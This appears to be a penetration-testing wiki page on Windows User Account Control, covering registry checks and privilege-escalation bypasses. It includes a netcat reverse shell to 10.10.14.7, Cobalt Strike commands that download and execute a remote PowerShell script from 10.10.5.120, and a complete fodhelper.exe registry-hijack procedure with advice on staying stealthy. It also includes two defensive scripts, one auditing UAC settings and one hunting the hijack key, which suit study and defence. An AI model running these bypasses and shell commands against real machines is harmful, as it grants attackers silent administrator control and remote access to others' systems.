UAC - User Account Control


UAC

User Account Control (UAC) is a feature that enables a consent prompt for elevated activities. Applications have different integrity levels, and a program with a high level can perform tasks that could potentially compromise the system. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.

For more info about integrity levels:

Integrity Levels

When UAC is in place, an administrator user is given two tokens: a standard user token, used to perform regular actions at the regular level, and one carrying the administrator privileges.

This page discusses how UAC works in great depth and covers the logon process, the user experience, and the UAC architecture. Administrators can use security policies to configure how UAC works specifically for their organization at the local level (using secpol.msc), or configure the settings and push them out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail here. There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:

UAC Bypass Theory

Some programs are auto-elevated automatically if the user belongs to the Administrators group. These binaries have the autoElevate option set to true inside their manifests. The binary also has to be signed by Microsoft.

Many auto-elevate processes expose functionality via COM objects or RPC servers, which can be invoked from processes running at medium integrity (regular user-level privileges). Note that COM (Component Object Model) and RPC (Remote Procedure Call) are the mechanisms Windows programs use to communicate and execute functions across process boundaries. For example, the IFileOperation COM object is designed to handle file operations (copying, deleting, moving) and can automatically elevate privileges without a prompt.

Note that some checks might be performed, such as verifying that the calling process was run from the System32 directory; these can be bypassed, for example, by injecting into explorer.exe or another System32-located executable.

Another way to bypass these checks is to modify the PEB. Every process in Windows has a Process Environment Block (PEB), which includes important data about the process, such as its executable path. By modifying the PEB, attackers can fake (spoof) the location of their own malicious process, making it appear to run from a trusted directory (like system32). This spoofed information tricks the COM object into auto-elevating privileges without prompting the user.

Therefore, to bypass UAC (elevate from medium to high integrity level), some attackers use this kind of binary to execute arbitrary code, because the code will run from a high-integrity process.

You can check the manifest of a binary using the tool sigcheck.exe from Sysinternals (sigcheck.exe -m <file>), and you can see the integrity level of processes using Process Explorer or Process Monitor (also from Sysinternals).

Check UAC

To confirm if UAC is enabled do:

```cmd
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA    REG_DWORD    0x1
```

If it is 1 then UAC is enabled; if it is 0 or it doesn't exist, then UAC is disabled.

Then, check which level is configured:

```cmd
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin    REG_DWORD    0x5
```

  • If 0, UAC won't prompt (like disabled)
  • If 1, the admin is asked for username and password to execute the binary with high rights (on the Secure Desktop)
  • If 2 (Always notify me), UAC will always ask the administrator for confirmation when they try to execute something with high privileges (on the Secure Desktop)
  • If 3, like 1 but not necessarily on the Secure Desktop
  • If 4, like 2 but not necessarily on the Secure Desktop
  • If 5 (default), it will ask the administrator to confirm running non-Windows binaries with high privileges

Then, you have to take a look at the value of LocalAccountTokenFilterPolicy.
If the value is 0, then only the RID 500 user (built-in Administrator) is able to perform admin tasks without UAC, and if it is 1, all accounts inside the "Administrators" group can do them.

And, finally, take a look at the value of the key FilterAdministratorToken.
If 0 (default), the built-in Administrator account can do remote administration tasks, and if 1 the built-in Administrator account cannot do remote administration tasks, unless LocalAccountTokenFilterPolicy is set to 1.

Summary

  • If EnableLUA=0 or doesn't exist, no UAC for anyone
  • If EnableLUA=1 and LocalAccountTokenFilterPolicy=1, no UAC for anyone
  • If EnableLUA=1 and LocalAccountTokenFilterPolicy=0 and FilterAdministratorToken=0, no UAC for RID 500 (built-in Administrator)
  • If EnableLUA=1 and LocalAccountTokenFilterPolicy=0 and FilterAdministratorToken=1, UAC for everyone

All this information can be gathered using the metasploit module: post/windows/gather/win_privs

You can also check the groups of your user and get the integrity level:

```cmd
net user %username%
whoami /groups | findstr Level
```
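The checks above can be scripted for auditing. The following is an added example (not code from the original page): it reads the four registry values discussed in this section and applies the page's summary table to report the effective UAC posture, assuming Windows PowerShell 5.1 or later on the host being audited.

```powershell
# Added example, not from the original page: read the four UAC registry values
# discussed above and apply this page's summary table to report the effective posture.
# Assumes Windows PowerShell 5.1 or later, run on the host being audited.
$policyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacValue {
    param([string]$Name, [int]$Default)
    $item = Get-ItemProperty -Path $policyKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }   # value absent: the documented default applies
    return [int]$item.$Name
}

# Meaning of ConsentPromptBehaviorAdmin, as listed above
$promptMeaning = @{
    0 = 'no prompt (like disabled)'
    1 = 'prompt for credentials on the Secure Desktop'
    2 = 'Always notify: prompt for consent on the Secure Desktop'
    3 = 'prompt for credentials, not necessarily on the Secure Desktop'
    4 = 'prompt for consent, not necessarily on the Secure Desktop'
    5 = 'prompt for consent for non-Windows binaries (default)'
}

$enableLua   = Get-UacValue -Name 'EnableLUA'                     -Default 0
$consent     = Get-UacValue -Name 'ConsentPromptBehaviorAdmin'    -Default 5
$tokenFilter = Get-UacValue -Name 'LocalAccountTokenFilterPolicy' -Default 0
$filterAdmin = Get-UacValue -Name 'FilterAdministratorToken'      -Default 0

# Decision table from the Summary section of this page
$effective = 'UAC for everyone'
if ($enableLua -eq 0) {
    $effective = 'No UAC for anyone (EnableLUA=0 or missing)'
} elseif ($tokenFilter -eq 1) {
    $effective = 'No UAC for anyone (LocalAccountTokenFilterPolicy=1)'
} elseif ($filterAdmin -eq 0) {
    $effective = 'No UAC for RID 500 (built-in Administrator)'
}

[pscustomobject]@{
    EnableLUA                     = $enableLua
    ConsentPromptBehaviorAdmin    = "$consent ($($promptMeaning[$consent]))"
    LocalAccountTokenFilterPolicy = $tokenFilter
    FilterAdministratorToken      = $filterAdmin
    EffectivePosture              = $effective
    # Same check as "whoami /groups | findstr Level" above, for the current process
    CurrentIntegrity              = (whoami /groups | Select-String 'Mandatory Level').Line.Trim()
}
```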

UAC bypass

tip

Remember that if you have GUI access to the victim, a UAC bypass is straightforward, because you can just click "Yes" when the UAC prompt appears.

A UAC bypass is needed in the following situation: UAC is enabled, your process is running in a medium integrity context, and your user belongs to the Administrators group.

It is important to mention that it is much harder to bypass UAC if it is at the highest security level (Always) than if it is at any of the other levels (Default).

UAC disabled

If UAC is already disabled (ConsentPromptBehaviorAdmin is 0) you can execute a reverse shell with admin privileges (high integrity level) using something like:

```powershell
# Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```

UAC bypass with token duplication

Very basic UAC "bypass" (full file system access)

If you have a shell with a user that is inside the Administrators group you can mount the C$ share via SMB (file system) locally as a new drive, and you will have access to everything inside the file system (even the Administrator's home folder).

warning

It seems this trick no longer works.

```cmd
net use Z: \\127.0.0.1\c$
REM Switch to the newly mapped drive
Z:

REM Or you could just access it directly:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```

UAC bypass with Cobalt Strike

The Cobalt Strike techniques will only work if UAC is not set at its maximum security level.

```
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```

Empire and Metasploit also have several modules to bypass UAC.

KRBUACBypass

Documentation and tool are available at https://github.com/wh0amitz/KRBUACBypass

UAC bypass exploits

UACME is a compilation of several UAC bypass exploits. Note that you will need to compile UACME using Visual Studio or msbuild. The compilation will create several executables (like Source\Akagi\outout\x64\Debug\Akagi.exe); you will need to know which one you need.
You should be careful, because some bypasses will prompt other programs that will alert the user that something is happening.

UACME records the build version from which each technique started working. You can search for a technique affecting your version:

```powershell
PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0
```

Also, using this page you can get the Windows release (1607) from the build number.

UAC Bypass – fodhelper.exe (Registry hijack)

The trusted binary fodhelper.exe is auto-elevated on modern Windows. When launched, it queries the per-user registry path below without validating the DelegateExecute verb. Planting a command there lets a Medium Integrity process (with the user in Administrators) spawn a High Integrity process without a UAC prompt.

Registry path queried by fodhelper:

HKCU\Software\Classes\ms-settings\Shell\Open\command

PowerShell steps (set your payload, then trigger):

```powershell
# Optional: from a 32-bit shell on 64-bit Windows, spawn a 64-bit PowerShell for stability
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell -nop -w hidden -c "$PSVersionTable.PSEdition"

# 1) Create the vulnerable key and values
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force | Out-Null

# 2) Set default command to your payload (example: reverse shell or cmd)
# Replace <BASE64_PS> with your base64-encoded PowerShell (or any command)
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -e <BASE64_PS>" -Force

# 3) Trigger auto-elevation
Start-Process -FilePath "C:\Windows\System32\fodhelper.exe"

# 4) (Recommended) Cleanup
Remove-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open" -Recurse -Force
```

Notes:

  • Works when the current user is a member of Administrators and the UAC level is default/lenient (not Always Notify with additional restrictions).
  • Use the sysnative path to spawn a 64-bit PowerShell from a 32-bit process on 64-bit Windows.
  • The payload can be any command (PowerShell, cmd, or an EXE path). Avoid showing UIs to remain stealthy.
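As an added defensive check (not part of the original page), the script below hunts for the per-user ms-settings Shell\Open\command key that this technique plants, across every loaded user hive, and removes it when run with the -Remediate switch; it assumes Windows PowerShell 5.1 or later and enough rights to read other users' hives (an elevated session, for hives other than your own).

```powershell
# Added example, not from the original page: hunt for the per-user ms-settings
# handler key that the fodhelper technique plants, across all loaded user hives.
# Assumes PowerShell 5.1+; reading hives other than your own needs an elevated session.
param([switch]$Remediate)

# This key is not normally present in a user's hive, so any hit deserves a look.
$findings = @()

# Expose HKEY_USERS as a drive so every loaded profile hive can be enumerated.
if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
    New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
}

foreach ($hive in Get-ChildItem -Path 'HKU:\') {
    # Per-user Classes data lives in the <SID>_Classes hive and is also linked under
    # <SID>\Software\Classes, so check both forms; a hit may therefore be listed twice.
    $keyPath = if ($hive.PSChildName -match '_Classes$') {
        "HKU:\$($hive.PSChildName)\ms-settings\Shell\Open\command"
    } else {
        "HKU:\$($hive.PSChildName)\Software\Classes\ms-settings\Shell\Open\command"
    }
    if (-not (Test-Path -Path $keyPath)) { continue }

    $props = Get-ItemProperty -Path $keyPath
    $findings += [pscustomobject]@{
        Hive            = $hive.PSChildName
        Command         = $props.'(default)'
        DelegateExecute = [bool]($props.PSObject.Properties.Name -contains 'DelegateExecute')
        KeyPath         = $keyPath
    }
    if ($Remediate) {
        # Remove the whole Shell\Open branch, matching the cleanup step above.
        Remove-Item -Path (Split-Path -Path $keyPath -Parent) -Recurse -Force
    }
}

if ($findings.Count -eq 0) {
    'No ms-settings Shell\Open\command key found in any loaded user hive.'
} else {
    $findings | Format-Table -AutoSize
}
```

Run it periodically or from an EDR response playbook; the presence of this key with a non-empty default command is the artifact to alert on, and the (default) value shows what would have been launched at high integrity.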

More UAC bypass

All the techniques used here to bypass UAC require a full interactive shell with the victim (a common nc.exe shell is not enough).

You can get this using a meterpreter session. Migrate to a process that has the Session value equal to 1:

(explorer.exe should work)

UAC Bypass with GUI

If you have access to a GUI you can just accept the UAC prompt when you get it; you don't really need a bypass. So, getting access to a GUI will allow you to bypass UAC.

Moreover, if you get a GUI session that someone was using (potentially via RDP), there are some tools that will be running as administrator from which you could run a cmd, for example, as admin directly without being prompted again by UAC, like https://github.com/oski02/UAC-GUI-Bypass-appverif. This might be a bit more stealthy.

Noisy brute-force UAC bypass

If you don't care about being noisy you could always run something like https://github.com/Chainski/ForceAdmin, which asks to elevate permissions until the user accepts it.

Your own bypass - Basic UAC bypass methodology

If you take a look at UACME you will note that most UAC bypasses abuse a DLL Hijacking vulnerability (mainly writing the malicious DLL on C:\Windows\System32). Read this to learn how to find a DLL Hijacking vulnerability.

  1. Find a binary that will autoelevate (check that when it is executed it runs at a high integrity level).
  2. With procmon find "NAME NOT FOUND" events that can be vulnerable to DLL Hijacking.
  3. You will probably need to write the DLL inside some protected paths (like C:\Windows\System32) where you don't have write permissions. You can bypass this using:
     • wusa.exe: Windows 7, 8 and 8.1. It allows extracting the contents of a CAB file inside protected paths (because this tool is executed from a high integrity level).
     • IFileOperation: Windows 10.
  4. Prepare a script to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.

Another UAC bypass technique

Consists in watching whether an autoElevated binary tries to read from the registry the name/path of a binary or command to be executed (this is more interesting if the binary searches for this information inside HKCU).
